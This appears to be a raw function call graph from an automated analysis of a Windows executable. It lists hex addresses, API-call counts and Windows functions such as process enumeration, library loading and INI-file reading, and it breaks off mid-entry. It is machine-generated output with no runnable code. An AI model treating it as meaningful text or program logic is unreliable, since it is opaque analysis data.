38024->37818 38025->37763 38027 42a175 38026->38027 38029 42a122 38026->38029 38027->37939 38032 42b13b 147 API calls 38027->38032 38029->38027 38030 42a115 147 API calls 38029->38030 38033 43a174 38029->38033 38057 42a0a8 147 API calls 38029->38057 38030->38029 38032->37943 38047 43a196 38033->38047 38048 43a19e 38033->38048 38034 43a306 38034->38047 38075 4388c4 14 API calls 38034->38075 38037 42a115 147 API calls 38037->38048 38039 43a642 38039->38047 38080 4169a7 11 API calls 38039->38080 38043 43a635 38079 42c02e memset 38043->38079 38047->38029 38048->38034 38048->38037 38048->38047 38058 42ff8c 38048->38058 38066 415a91 38048->38066 38070 4165ff 11 API calls 38048->38070 38071 439504 13 API calls 38048->38071 38072 4312d0 147 API calls 38048->38072 38073 42be4c memcpy memcpy memcpy memset memcpy 38048->38073 38074 43a121 11 API calls 38048->38074 38050 4169a7 11 API calls 38051 43a325 38050->38051 38051->38039 38051->38043 38051->38047 38051->38050 38052 42b5b5 memset memcpy 38051->38052 38053 42bf4c 14 API calls 38051->38053 38076 42b63e 14 API calls 38051->38076 38077 4165ff 11 API calls 38051->38077 38078 42bfcf memcpy 38051->38078 38052->38051 38053->38051 38057->38029 38081 43817e 38058->38081 38060 42ff9d 38060->38048 38061 42ff99 38061->38060 38062 42ffe3 38061->38062 38063 42ffd0 38061->38063 38086 4169a7 11 API calls 38062->38086 38085 4169a7 11 API calls 38063->38085 38067 415a9d 38066->38067 38068 415ab3 38067->38068 38069 415aa4 memset 38067->38069 38068->38048 38069->38068 38070->38048 38071->38048 38072->38048 38073->38048 38074->38048 38075->38051 38076->38051 38077->38051 38078->38051 38079->38039 38080->38047 38082 438187 38081->38082 38084 438192 38081->38084 38087 4380f6 38082->38087 38084->38061 38085->38060 38086->38060 38089 43811f 38087->38089 38088 438164 38088->38084 38089->38088 38092 437e5e 38089->38092 38115 4300e8 memset memset memcpy 38089->38115 38116 437d3c 38092->38116 38094 437eb3 38094->38089 38095 437ea9 38095->38094 38100 437f22 38095->38100 38131 41f432 38095->38131 38098 437f06 38142 415c56 11 API calls 38098->38142 38102 437f7f 38100->38102 38143 432d4e 38100->38143 38103 437f95 38102->38103 38104 43802b 38102->38104 38147 415c56 11 API calls 38103->38147 38148 4165ff 11 API calls 38104->38148 38107 438054 38149 437371 138 API calls 38107->38149 38110 43806b 38111 438094 38110->38111 38150 42f50e 138 API calls 38110->38150 38113 437fa3 38111->38113 38151 4300e8 memset memset memcpy 38111->38151 38113->38094 38152 41f638 104 API calls 38113->38152 38115->38089 38117 437d69 38116->38117 38120 437d80 38116->38120 38153 437ccb 11 API calls 38117->38153 38119 437d76 38119->38095 38120->38119 38121 437da3 38120->38121 38123 437d90 38120->38123 38154 438460 38121->38154 38123->38119 38169 437ccb 11 API calls 38123->38169 38125 437de8 38168 424f26 123 API calls 38125->38168 38127 437dcb 38127->38125 38166 444283 13 API calls 38127->38166 38129 437dfc 38167 437ccb 11 API calls 38129->38167 38132 41f54d 38131->38132 38138 41f44f 38131->38138 38133 41f466 38132->38133 38199 41c635 memset memset 38132->38199 38133->38098 38133->38100 38138->38133 38140 41f50b 38138->38140 38170 41f1a5 38138->38170 38195 41c06f memcmp 38138->38195 38196 41f3b1 90 API calls 38138->38196 38197 41f398 86 API calls 38138->38197 38140->38132 38140->38133 38198 41c295 86 API calls 38140->38198 38142->38094 38144 432d65 38143->38144 38145 432d58 38143->38145 38144->38102 38200 432cc4 memset memset memcpy 38145->38200 38147->38113 38148->38107 38149->38110 38150->38111 38151->38113 38152->38094 38153->38119 38155 41703f 11 API calls 38154->38155 38156 43847a 38155->38156 38157 43848a 38156->38157 38158 43847e 38156->38158 38160 438270 134 API calls 38157->38160 38159 4446ea 11 API calls 38158->38159 38162 438488 38159->38162 38161 4384aa 38160->38161 38161->38162 38163 424f26 123 API calls 38161->38163 38162->38127 38164 4384bb 38163->38164 38165 438270 134 API calls 38164->38165 38165->38162 38166->38129 38167->38125 38168->38119 38169->38119 38171 41bc3b 101 API calls 38170->38171 38172 41f1b4 38171->38172 38173 41edad 86 API calls 38172->38173 38180 41f282 38172->38180 38174 41f1cb 38173->38174 38175 41f1f5 memcmp 38174->38175 38176 41f20e 38174->38176 38174->38180 38175->38176 38177 41f21b memcmp 38176->38177 38176->38180 38178 41f326 38177->38178 38181 41f23d 38177->38181 38179 41ee6b 86 API calls 38178->38179 38178->38180 38179->38180 38180->38138 38181->38178 38182 41f28e memcmp 38181->38182 38184 41c8df 56 API calls 38181->38184 38182->38178 38183 41f2a9 38182->38183 38183->38178 38186 41f308 38183->38186 38187 41f2d8 38183->38187 38185 41f269 38184->38185 38185->38178 38188 41f287 38185->38188 38189 41f27a 38185->38189 38186->38178 38193 4446ce 11 API calls 38186->38193 38190 41ee6b 86 API calls 38187->38190 38188->38182 38191 41ee6b 86 API calls 38189->38191 38192 41f2e0 38190->38192 38191->38180 38194 41b1ca memset 38192->38194 38193->38178 38194->38180 38195->38138 38196->38138 38197->38138 38198->38132 38199->38133 38200->38144 38201 41276d 38202 41277d 38201->38202 38244 4044a4 LoadLibraryW 38202->38244 38204 412785 38206 412789 38204->38206 38252 414b81 38204->38252 38208 4127c8 38258 412465 memset ??2@YAPAXI 38208->38258 38210 4127ea 38270 40ac21 38210->38270 38215 412813 38288 40dd07 memset 38215->38288 38216 412827 38293 40db69 memset 38216->38293 38219 412822 38315 4125b6 ??3@YAXPAX DeleteObject 38219->38315 38221 40ada2 _wcsicmp 38222 41283d 38221->38222 38222->38219 38225 412863 CoInitialize 38222->38225 38298 41268e 38222->38298 38224 412966 38316 40b1ab free free 38224->38316 38314 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38225->38314 38229 41296f 38317 40b633 38229->38317 38231 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38236 412957 CoUninitialize 38231->38236 38241 4128ca 38231->38241 38236->38219 38237 4128d0 TranslateAcceleratorW 38238 412941 GetMessageW 38237->38238 38237->38241 38238->38236 38238->38237 38239 412909 IsDialogMessageW 38239->38238 38239->38241 38240 4128fd IsDialogMessageW 38240->38238 38240->38239 38241->38237 38241->38239 38241->38240 38242 41292b TranslateMessage DispatchMessageW 38241->38242 38243 41291f IsDialogMessageW 38241->38243 38242->38238 38243->38238 38243->38242 38245 4044f7 38244->38245 38246 4044cf GetProcAddress 38244->38246 38250 404507 MessageBoxW 38245->38250 38251 40451e 38245->38251 38247 4044e8 FreeLibrary 38246->38247 38248 4044df 38246->38248 38247->38245 38249 4044f3 38247->38249 38248->38247 38249->38245 38250->38204 38251->38204 38253 414b8a 38252->38253 38254 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38252->38254 38321 40a804 memset 38253->38321 38254->38208 38257 414b9e GetProcAddress 38257->38254 38259 4124e0 38258->38259 38260 412505 ??2@YAPAXI 38259->38260 38261 41251c 38260->38261 38264 412521 38260->38264 38343 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38261->38343 38332 444722 38264->38332 38269 41259b wcscpy 38269->38210 38348 40b1ab free free 38270->38348 38272 40ad76 38349 40aa04 38272->38349 38275 40a9ce malloc memcpy free free 38278 40ac5c 38275->38278 38276 40ad4b 38276->38272 38372 40a9ce 38276->38372 38278->38272 38278->38275 38278->38276 38279 40ace7 free 38278->38279 38352 40a8d0 38278->38352 38364 4099f4 38278->38364 38279->38278 38283 40a8d0 7 API calls 38283->38272 38284 40ada2 38285 40adc9 38284->38285 38286 40adaa 38284->38286 38285->38215 38285->38216 38286->38285 38287 40adb3 _wcsicmp 38286->38287 38287->38285 38287->38286 38377 40dce0 38288->38377 38290 40dd3a GetModuleHandleW 38382 40dba7 38290->38382 38294 40dce0 3 API calls 38293->38294 38295 40db99 38294->38295 38454 40dae1 38295->38454 38468 402f3a 38298->38468 38300 4126a8 38301 412766 38300->38301 38302 4126d3 _wcsicmp 38300->38302 38304 41270a 38300->38304 38502 4125f8 7 API calls 38300->38502 38301->38219 38301->38225 38302->38300 38304->38301 38471 411ac5 38304->38471 38314->38231 38315->38224 38316->38229 38318 40b640 38317->38318 38319 40b639 free 38317->38319 38320 40b1ab free free 38318->38320 38319->38318 38320->38206 38322 40a83b GetSystemDirectoryW 38321->38322 38323 40a84c wcscpy 38321->38323 38322->38323 38328 409719 wcslen 38323->38328 38326 40a881 LoadLibraryW 38327 40a886 38326->38327 38327->38254 38327->38257 38329 409724 38328->38329 38330 409739 wcscat LoadLibraryW 38328->38330 38329->38330 38331 40972c wcscat 38329->38331 38330->38326 38330->38327 38331->38330 38333 444732 38332->38333 38334 444728 DeleteObject 38332->38334 38344 409cc3 38333->38344 38334->38333 38336 412551 38337 4010f9 38336->38337 38338 401130 38337->38338 38339 401134 GetModuleHandleW LoadIconW 38338->38339 38340 401107 wcsncat 38338->38340 38341 40a7be 38339->38341 38340->38338 38342 40a7d2 38341->38342 38342->38269 38342->38342 38343->38264 38347 409bfd memset wcscpy 38344->38347 38346 409cdb CreateFontIndirectW 38346->38336 38347->38346 38348->38278 38350 40aa14 38349->38350 38351 40aa0a free 38349->38351 38350->38284 38351->38350 38353 40a8eb 38352->38353 38354 40a8df wcslen 38352->38354 38355 40a906 free 38353->38355 38356 40a90f 38353->38356 38354->38353 38357 40a919 38355->38357 38358 4099f4 3 API calls 38356->38358 38359 40a932 38357->38359 38360 40a929 free 38357->38360 38358->38357 38362 4099f4 3 API calls 38359->38362 38361 40a93e memcpy 38360->38361 38361->38278 38363 40a93d 38362->38363 38363->38361 38365 409a41 38364->38365 38366 4099fb malloc 38364->38366 38365->38278 38368 409a37 38366->38368 38369 409a1c 38366->38369 38368->38278 38370 409a30 free 38369->38370 38371 409a20 memcpy 38369->38371 38370->38368 38371->38370 38373 40a9e7 38372->38373 38374 40a9dc free 38372->38374 38375 4099f4 3 API calls 38373->38375 38376 40a9f2 38374->38376 38375->38376 38376->38283 38401 409bca GetModuleFileNameW 38377->38401 38379 40dce6 wcsrchr 38380 40dcf5 38379->38380 38381 40dcf9 wcscat 38379->38381 38380->38381 38381->38290 38402 44db70 38382->38402 38384 40dbb4 memset memset 38404 409bca GetModuleFileNameW 38384->38404 38386 40dbfd 38405 4447d9 38386->38405 38389 40dc34 wcscpy wcscpy 38431 40d6f5 38389->38431 38390 40dc1f wcscpy 38390->38389 38393 40d6f5 3 API calls 38394 40dc73 38393->38394 38395 40d6f5 3 API calls 38394->38395 38396 40dc89 38395->38396 38397 40d6f5 3 API calls 38396->38397 38398 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38397->38398 38437 40da80 38398->38437 38401->38379 38403 44db77 38402->38403 38403->38384 38403->38403 38404->38386 38407 4447f4 38405->38407 38406 40dc1b 38406->38389 38406->38390 38407->38406 38408 444807 ??2@YAPAXI 38407->38408 38409 44481f 38408->38409 38410 444873 _snwprintf 38409->38410 38411 4448ab wcscpy 38409->38411 38444 44474a 8 API calls 38410->38444 38413 4448bb 38411->38413 38445 44474a 8 API calls 38413->38445 38414 4448a7 38414->38411 38414->38413 38416 4448cd 38446 44474a 8 API calls 38416->38446 38418 4448e2 38447 44474a 8 API calls 38418->38447 38420 4448f7 38448 44474a 8 API calls 38420->38448 38422 44490c 38449 44474a 8 API calls 38422->38449 38424 444921 38450 44474a 8 API calls 38424->38450 38426 444936 38451 44474a 8 API calls 38426->38451 38428 44494b 38452 44474a 8 API calls 38428->38452 38430 444960 ??3@YAXPAX 38430->38406 38432 44db70 38431->38432 38433 40d702 memset GetPrivateProfileStringW 38432->38433 38434 40d752 38433->38434 38435 40d75c WritePrivateProfileStringW 38433->38435 38434->38435 38436 40d758 38434->38436 38435->38436 38436->38393 38438 44db70 38437->38438 38439 40da8d memset 38438->38439 38440 40daac LoadStringW 38439->38440 38443 40dac6 38440->38443 38442 40dade 38442->38219 38443->38440 38443->38442 38453 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38443->38453 38444->38414 38445->38416 38446->38418 38447->38420 38448->38422 38449->38424 38450->38426 38451->38428 38452->38430 38453->38443 38464 409b98 GetFileAttributesW 38454->38464 38456 40daea 38457 40daef wcscpy wcscpy GetPrivateProfileIntW 38456->38457 38463 40db63 38456->38463 38465 40d65d GetPrivateProfileStringW 38457->38465 38459 40db3e 38466 40d65d GetPrivateProfileStringW 38459->38466 38461 40db4f 38467 40d65d GetPrivateProfileStringW 38461->38467 38463->38221 38464->38456 38465->38459 38466->38461 38467->38463 38503 40eaff 38468->38503 38472 411ae2 memset 38471->38472 38473 411b8f 38471->38473 38543 409bca GetModuleFileNameW 38472->38543 38485 411a8b 38473->38485 38475 411b0a wcsrchr 38476 411b22 wcscat 38475->38476 38477 411b1f 38475->38477 38544 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38476->38544 38477->38476 38479 411b67 38545 402afb 38479->38545 38483 411b7f 38601 40ea13 SendMessageW memset SendMessageW 38483->38601 38486 402afb 27 API calls 38485->38486 38487 411ac0 38486->38487 38488 4110dc 38487->38488 38489 41113e 38488->38489 38494 4110f0 38488->38494 38626 40969c LoadCursorW SetCursor 38489->38626 38491 411143 38627 444a54 38491->38627 38630 4032b4 38491->38630 38492 4110f7 _wcsicmp 38492->38494 38493 411157 38495 40ada2 _wcsicmp 38493->38495 38494->38489 38494->38492 38648 410c46 10 API calls 38494->38648 38498 411167 38495->38498 38496 4111af 38498->38496 38499 4111a6 qsort 38498->38499 38499->38496 38502->38300 38504 40eb10 38503->38504 38516 40e8e0 38504->38516 38507 40eb6c memcpy memcpy 38508 40ebb7 38507->38508 38508->38507 38509 40ebf2 ??2@YAPAXI ??2@YAPAXI 38508->38509 38512 40d134 16 API calls 38508->38512 38510 40ec2e ??2@YAPAXI 38509->38510 38511 40ec65 38509->38511 38510->38511 38526 40ea7f 38511->38526 38512->38508 38515 402f49 38515->38300 38517 40e8f2 38516->38517 38518 40e8eb ??3@YAXPAX 38516->38518 38519 40e900 38517->38519 38520 40e8f9 ??3@YAXPAX 38517->38520 38518->38517 38521 40e911 38519->38521 38522 40e90a ??3@YAXPAX 38519->38522 38520->38519 38523 40e931 ??2@YAPAXI ??2@YAPAXI 38521->38523 38524 40e921 ??3@YAXPAX 38521->38524 38525 40e92a ??3@YAXPAX 38521->38525 38522->38521 38523->38507 38524->38525 38525->38523 38527 40aa04 free 38526->38527 38528 40ea88 38527->38528 38529 40aa04 free 38528->38529 38530 40ea90 38529->38530 38531 40aa04 free 38530->38531 38532 40ea98 38531->38532 38533 40aa04 free 38532->38533 38534 40eaa0 38533->38534 38535 40a9ce 4 API calls 38534->38535 38536 40eab3 38535->38536 38537 40a9ce 4 API calls 38536->38537 38538 40eabd 38537->38538 38539 40a9ce 4 API calls 38538->38539 38540 40eac7 38539->38540 38541 40a9ce 4 API calls 38540->38541 38542 40ead1 38541->38542 38542->38515 38543->38475 38544->38479 38602 40b2cc 38545->38602 38547 402b0a 38548 40b2cc 27 API calls 38547->38548 38549 402b23 38548->38549 38550 40b2cc 27 API calls 38549->38550 38551 402b3a 38550->38551 38552 40b2cc 27 API calls 38551->38552 38553 402b54 38552->38553 38554 40b2cc 27 API calls 38553->38554 38555 402b6b 38554->38555 38556 40b2cc 27 API calls 38555->38556 38557 402b82 38556->38557 38558 40b2cc 27 API calls 38557->38558 38559 402b99 38558->38559 38560 40b2cc 27 API calls 38559->38560 38561 402bb0 38560->38561 38562 40b2cc 27 API calls 38561->38562 38563 402bc7 38562->38563 38564 40b2cc 27 API calls 38563->38564 38565 402bde 38564->38565 38566 40b2cc 27 API calls 38565->38566 38567 402bf5 38566->38567 38568 40b2cc 27 API calls 38567->38568 38569 402c0c 38568->38569 38570 40b2cc 27 API calls 38569->38570 38571 402c23 38570->38571 38572 40b2cc 27 API calls 38571->38572 38573 402c3a 38572->38573 38574 40b2cc 27 API calls 38573->38574 38575 402c51 38574->38575 38576 40b2cc 27 API calls 38575->38576 38577 402c68 38576->38577 38578 40b2cc 27 API calls 38577->38578 38579 402c7f 38578->38579 38580 40b2cc 27 API calls 38579->38580 38581 402c99 38580->38581 38582 40b2cc 27 API calls 38581->38582 38583 402cb3 38582->38583 38584 40b2cc 27 API calls 38583->38584 38585 402cd5 38584->38585 38586 40b2cc 27 API calls 38585->38586 38587 402cf0 38586->38587 38588 40b2cc 27 API calls 38587->38588 38589 402d0b 38588->38589 38590 40b2cc 27 API calls 38589->38590 38591 402d26 38590->38591 38592 40b2cc 27 API calls 38591->38592 38593 402d3e 38592->38593 38594 40b2cc 27 API calls 38593->38594 38595 402d59 38594->38595 38596 40b2cc 27 API calls 38595->38596 38597 402d78 38596->38597 38598 40b2cc 27 API calls 38597->38598 38599 402d93 38598->38599 38600 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38599->38600 38600->38483 38601->38473 38605 40b58d 38602->38605 38604 40b2d1 38604->38547 38606 40b5a4 GetModuleHandleW FindResourceW 38605->38606 38607 40b62e 38605->38607 38608 40b5c2 LoadResource 38606->38608 38610 40b5e7 38606->38610 38607->38604 38609 40b5d0 SizeofResource LockResource 38608->38609 38608->38610 38609->38610 38610->38607 38618 40afcf 38610->38618 38612 40b608 memcpy 38621 40b4d3 memcpy 38612->38621 38614 40b61e 38622 40b3c1 18 API calls 38614->38622 38616 40b626 38623 40b04b 38616->38623 38619 40b04b ??3@YAXPAX 38618->38619 38620 40afd7 ??2@YAPAXI 38619->38620 38620->38612 38621->38614 38622->38616 38624 40b051 ??3@YAXPAX 38623->38624 38625 40b05f 38623->38625 38624->38625 38625->38607 38626->38491 38628 444a64 FreeLibrary 38627->38628 38629 444a83 38627->38629 38628->38629 38629->38493 38631 4032c4 38630->38631 38632 40b633 free 38631->38632 38633 403316 38632->38633 38649 44553b 38633->38649 38637 403480 38847 40368c 15 API calls 38637->38847 38639 403489 38640 40b633 free 38639->38640 38642 403495 38640->38642 38641 40333c 38641->38637 38643 4033a9 memset memcpy 38641->38643 38644 4033ec wcscmp 38641->38644 38845 4028e7 11 API calls 38641->38845 38846 40f508 6 API calls 38641->38846 38642->38493 38643->38641 38643->38644 38644->38641 38647 403421 _wcsicmp 38647->38641 38648->38494 38650 445548 38649->38650 38651 445599 38650->38651 38848 40c768 38650->38848 38653 4455a8 memset 38651->38653 38660 4457f2 38651->38660 38932 403988 38653->38932 38659 4458aa 38662 4458bb memset memset 38659->38662 38742 44594a 38659->38742 38668 445854 38660->38668 39035 403e2d memset memset memset memset memset 38660->39035 38661 445672 38943 403fbe memset memset memset memset memset 38661->38943 38666 414c2e 17 API calls 38662->38666 38664 44595e memset memset 38670 414c2e 17 API calls 38664->38670 38665 4455e5 38665->38661 38678 44560f 38665->38678 38671 4458f9 38666->38671 38667 44557a 38672 44558c 38667->38672 38912 4136c0 38667->38912 38668->38659 39058 403c9c memset memset memset memset memset 38668->39058 38676 44599c 38670->38676 38677 40b2cc 27 API calls 38671->38677 38916 444b06 38672->38916 38674 445823 38722 4087b3 338 API calls 38674->38722 38743 445849 38674->38743 38675 445a00 memset memset 38684 414c2e 17 API calls 38675->38684 38687 40b2cc 27 API calls 38676->38687 38688 445909 38677->38688 38691 4087b3 338 API calls 38678->38691 38680 445879 38726 4087b3 338 API calls 38680->38726 38746 44589f 38680->38746 38681 445b38 memset memset memset 38693 445bd4 38681->38693 38694 445b98 38681->38694 38685 445a3e 38684->38685 38701 40b2cc 27 API calls 38685->38701 38696 4459ac 38687->38696 38705 409d1f 6 API calls 38688->38705 38689 445cf0 38704 403335 38689->38704 38713 445d88 memset memset memset 38689->38713 38731 445d3d 38689->38731 38690 445c8b memset memset 38697 414c2e 17 API calls 38690->38697 38706 445621 38691->38706 39081 414c2e 38693->39081 38694->38693 38699 445ba2 38694->38699 38695 445680 38700 4456b2 38695->38700 38966 4087b3 memset 38695->38966 38707 409d1f 6 API calls 38696->38707 38708 445cc9 38697->38708 39219 4099c6 wcslen 38699->39219 39114 40b1ab free free 38700->39114 38710 445a4f 38701->38710 38844 4452e5 45 API calls 38704->38844 38714 445919 38705->38714 39112 4454bf 20 API calls 38706->39112 38716 4459bc 38707->38716 38717 409d1f 6 API calls 38708->38717 38719 409d1f 6 API calls 38710->38719 38715 414c2e 17 API calls 38713->38715 39128 409b98 GetFileAttributesW 38714->39128 38723 445dde 38715->38723 39195 409b98 GetFileAttributesW 38716->39195 38725 445ce1 38717->38725 38718 445bb3 39222 445403 memset 38718->39222 38728 445a63 38719->38728 38720 40b2cc 27 API calls 38730 445bf3 38720->38730 38722->38674 38734 40b2cc 27 API calls 38723->38734 39239 409b98 GetFileAttributesW 38725->39239 38726->38680 38739 40b2cc 27 API calls 38728->38739 38729 44566d 38729->38660 39017 413d4c 38729->39017 39097 409d1f wcslen wcslen 38730->39097 38741 40b2cc 27 API calls 38731->38741 38732 445928 38732->38742 39129 40b6ef 38732->39129 38744 445def 38734->38744 38735 4459cb 38745 4459ed 38735->38745 38755 40b6ef 253 API calls 38735->38755 38748 445a94 38739->38748 38750 445d54 _wcsicmp 38741->38750 38742->38664 38742->38745 39126 40b1ab free free 38743->39126 38753 409d1f 6 API calls 38744->38753 38745->38675 38791 445b22 38745->38791 39127 40b1ab free free 38746->39127 38747 445389 259 API calls 38756 445bca 38747->38756 39196 40ae18 38748->39196 38760 445d71 38750->38760 38822 445d67 38750->38822 38752 445665 39113 40b1ab free free 38752->39113 38762 445e03 38753->38762 38755->38745 38756->38689 38756->38690 39240 445093 23 API calls 38760->39240 38761 44563c 38761->38752 38766 4087b3 338 API calls 38761->38766 39241 409b98 GetFileAttributesW 38762->39241 38763 4456d8 38769 40b2cc 27 API calls 38763->38769 38766->38761 38768 40b6ef 253 API calls 38768->38704 38774 4456e2 38769->38774 38770 40b2cc 27 API calls 38775 445c23 38770->38775 38771 445d83 38771->38704 38773 445e12 38780 445e6b 38773->38780 38784 40b2cc 27 API calls 38773->38784 39115 413fa6 _wcsicmp _wcsicmp 38774->39115 38778 409d1f 6 API calls 38775->38778 38776 445aa1 38779 445b17 38776->38779 38800 445ab2 memset 38776->38800 38814 409d1f 6 API calls 38776->38814 38818 445389 259 API calls 38776->38818 39203 40add4 38776->39203 39208 40ae51 38776->39208 38782 445c37 38778->38782 39216 40aebe 38779->39216 39243 445093 23 API calls 38780->39243 38781 4456eb 38787 4456fd memset memset memset memset 38781->38787 38788 4457ea 38781->38788 38789 445389 259 API calls 38782->38789 38792 445e33 38784->38792 39116 409c70 wcscpy wcsrchr 38787->39116 39119 413d29 38788->39119 38790 445c47 38789->38790 38797 40b2cc 27 API calls 38790->38797 38791->38681 38791->38756 38798 409d1f 6 API calls 38792->38798 38794 445e7e 38799 445f67 38794->38799 38802 445c53 38797->38802 38803 445e47 38798->38803 38804 40b2cc 27 API calls 38799->38804 38805 40b2cc 27 API calls 38800->38805 38801 409c70 2 API calls 38806 44577e 38801->38806 38807 409d1f 6 API calls 38802->38807 39242 409b98 GetFileAttributesW 38803->39242 38809 445f73 38804->38809 38805->38776 38810 409c70 2 API calls 38806->38810 38811 445c67 38807->38811 38813 409d1f 6 API calls 38809->38813 38815 44578d 38810->38815 38816 445389 259 API calls 38811->38816 38812 445e56 38812->38780 38819 445e83 memset 38812->38819 38817 445f87 38813->38817 38814->38776 38815->38788 38821 40b2cc 27 API calls 38815->38821 38816->38756 39246 409b98 GetFileAttributesW 38817->39246 38818->38776 38823 40b2cc 27 API calls 38819->38823 38824 4457a8 38821->38824 38822->38704 38822->38768 38825 445eab 38823->38825 38826 409d1f 6 API calls 38824->38826 38827 409d1f 6 API calls 38825->38827 38828 4457b8 38826->38828 38829 445ebf 38827->38829 39118 409b98 GetFileAttributesW 38828->39118 38831 40ae18 9 API calls 38829->38831 38840 445ef5 38831->38840 38832 4457c7 38832->38788 38834 4087b3 338 API calls 38832->38834 38833 40ae51 9 API calls 38833->38840 38834->38788 38835 445f5c 38836 40aebe FindClose 38835->38836 38836->38799 38837 40add4 2 API calls 38837->38840 38838 40b2cc 27 API calls 38838->38840 38839 409d1f 6 API calls 38839->38840 38840->38833 38840->38835 38840->38837 38840->38838 38840->38839 38842 445f3a 38840->38842 39244 409b98 GetFileAttributesW 38840->39244 39245 445093 23 API calls 38842->39245 38844->38641 38845->38647 38846->38641 38847->38639 38849 40c775 38848->38849 39247 40b1ab free free 38849->39247 38851 40c788 39248 40b1ab free free 38851->39248 38853 40c790 39249 40b1ab free free 38853->39249 38855 40c798 38856 40aa04 free 38855->38856 38857 40c7a0 38856->38857 39250 40c274 memset 38857->39250 38862 40a8ab 9 API calls 38863 40c7c3 38862->38863 38864 40a8ab 9 API calls 38863->38864 38865 40c7d0 38864->38865 39279 40c3c3 38865->39279 38869 40c877 38878 40bdb0 38869->38878 38870 40c86c 39307 4053fe 39 API calls 38870->39307 38873 40c813 _wcslwr 39305 40c634 50 API calls 38873->39305 38875 40c829 wcslen 38876 40c7e5 38875->38876 38876->38869 38876->38870 39304 40a706 wcslen memcpy 38876->39304 39306 40c634 50 API calls 38876->39306 39529 404363 38878->39529 38883 40b2cc 27 API calls 38884 40be02 wcslen 38883->38884 38885 40bf5d 38884->38885 38893 40be1e 38884->38893 39549 40440c 38885->39549 38886 40be26 wcsncmp 38886->38893 38889 40be7d memset 38890 40bea7 memcpy 38889->38890 38889->38893 38891 40bf11 wcschr 38890->38891 38890->38893 38891->38893 38892 40b2cc 27 API calls 38894 40bef6 _wcsnicmp 38892->38894 38893->38885 38893->38886 38893->38889 38893->38890 38893->38891 38893->38892 38895 40bf43 LocalFree 38893->38895 39552 40bd5d 28 API calls 38893->39552 39553 404423 38893->39553 38894->38891 38894->38893 38895->38893 38896 4135f7 39568 4135e0 38896->39568 38899 40b2cc 27 API calls 38900 41360d 38899->38900 38901 40a804 8 API calls 38900->38901 38902 413613 38901->38902 38903 41363e 38902->38903 38904 40b273 27 API calls 38902->38904 38905 4135e0 FreeLibrary 38903->38905 38906 413625 GetProcAddress 38904->38906 38907 413643 38905->38907 38906->38903 38908 413648 38906->38908 38907->38667 38909 413658 38908->38909 38910 4135e0 FreeLibrary 38908->38910 38909->38667 38911 413666 38910->38911 38911->38667 38914 4136e2 38912->38914 38913 413827 39111 41366b FreeLibrary 38913->39111 38914->38913 38915 4137ac CoTaskMemFree 38914->38915 38915->38914 39571 4449b9 38916->39571 38919 444c1f 38919->38651 38920 4449b9 42 API calls 38922 444b4b 38920->38922 38921 444c15 38924 4449b9 42 API calls 38921->38924 38922->38921 39592 444972 GetVersionExW 38922->39592 38924->38919 38925 444b99 memcmp 38930 444b8c 38925->38930 38926 444c0b 39596 444a85 42 API calls 38926->39596 38930->38925 38930->38926 39593 444aa5 42 API calls 38930->39593 39594 40a7a0 GetVersionExW 38930->39594 39595 444a85 42 API calls 38930->39595 38933 40399d 38932->38933 39597 403a16 38933->39597 38936 4039a3 38940 4039f4 38936->38940 38942 403a09 38936->38942 39608 40a02c CreateFileW 38936->39608 38937 403a12 wcsrchr 38937->38665 38941 4099c6 2 API calls 38940->38941 38940->38942 38941->38942 39611 40b1ab free free 38942->39611 38944 414c2e 17 API calls 38943->38944 38945 404048 38944->38945 38946 414c2e 17 API calls 38945->38946 38947 404056 38946->38947 38948 409d1f 6 API calls 38947->38948 38949 404073 38948->38949 38950 409d1f 6 API calls 38949->38950 38951 40408e 38950->38951 38952 409d1f 6 API calls 38951->38952 38953 4040a6 38952->38953 38954 403af5 20 API calls 38953->38954 38955 4040ba 38954->38955 38956 403af5 20 API calls 38955->38956 38957 4040cb 38956->38957 39638 40414f memset 38957->39638 38959 4040e0 38960 404140 38959->38960 38962 4040ec memset 38959->38962 38964 4099c6 2 API calls 38959->38964 38965 40a8ab 9 API calls 38959->38965 39652 40b1ab free free 38960->39652 38962->38959 38963 404148 38963->38695 38964->38959 38965->38959 39665 40a6e6 WideCharToMultiByte 38966->39665 38968 4087ed 39666 4095d9 memset 38968->39666 38971 408809 memset memset memset memset memset 38972 40b2cc 27 API calls 38971->38972 38973 4088a1 38972->38973 38974 409d1f 6 API calls 38973->38974 38975 4088b1 38974->38975 38976 40b2cc 27 API calls 38975->38976 38977 4088c0 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 4088d0 38978->38979 38980 40b2cc 27 API calls 38979->38980 38981 4088df 38980->38981 38982 409d1f 6 API calls 38981->38982 38983 4088ef 38982->38983 38984 40b2cc 27 API calls 38983->38984 38985 4088fe 38984->38985 38986 409d1f 6 API calls 38985->38986 38987 40890e 38986->38987 38988 40b2cc 27 API calls 38987->38988 38989 40891d 38988->38989 38990 409d1f 6 API calls 38989->38990 38991 40892d 38990->38991 39683 409b98 GetFileAttributesW 38991->39683 38993 40893e 38994 408943 38993->38994 38995 408958 38993->38995 39684 407fdf 75 API calls 38994->39684 39685 409b98 GetFileAttributesW 38995->39685 38998 408964 38999 408969 38998->38999 39000 40897b 38998->39000 39686 4082c7 199 API calls 38999->39686 39687 409b98 GetFileAttributesW 39000->39687 39003 408987 39004 4089a1 39003->39004 39005 40898c 39003->39005 39015 408953 39015->38695 39018 40b633 free 39017->39018 39019 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39018->39019 39020 413f00 Process32NextW 39019->39020 39021 413da5 OpenProcess 39020->39021 39022 413f17 CloseHandle 39020->39022 39023 413eb0 39021->39023 39024 413df3 memset 39021->39024 39022->38763 39023->39020 39026 413ebf free 39023->39026 39027 4099f4 3 API calls 39023->39027 39715 413f27 39024->39715 39026->39023 39027->39023 39028 413e37 GetModuleHandleW 39030 413e46 GetProcAddress 39028->39030 39032 413e1f 39028->39032 39030->39032 39031 413e6a QueryFullProcessImageNameW 39031->39032 39032->39028 39032->39031 39720 413959 39032->39720 39736 413ca4 39032->39736 39034 413ea2 CloseHandle 39034->39023 39036 